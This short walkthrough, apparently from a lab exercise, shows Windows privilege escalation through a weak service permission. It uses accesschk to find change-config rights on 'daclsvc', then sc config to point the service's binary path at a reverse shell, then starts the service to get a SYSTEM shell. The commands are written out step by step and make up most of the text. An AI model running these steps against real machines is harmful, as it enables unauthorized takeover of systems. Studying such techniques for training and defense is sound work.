now first of all we have the service daclsvc let’s check it’s permission using accesschk.exe

.\\accesschk /accepteula -uwcqv daclsvc

as we see we have SERVICE_CHANGE_CONFIG delegation which mean we can change the abuse the service to point to our malicious reverse shell

sc qc daclsvc

as we see the service is running with system privileges

so now let’s start to abuse it

sc config daclsvc binpath= "\\"C:\\Users\\user\\shell.exe""

as we see we modified the service binary path to point to out reverse shell so let’s open a listener and then run the service

net start daclsvc

now take a look at our reverse shell

and as we see we are authority system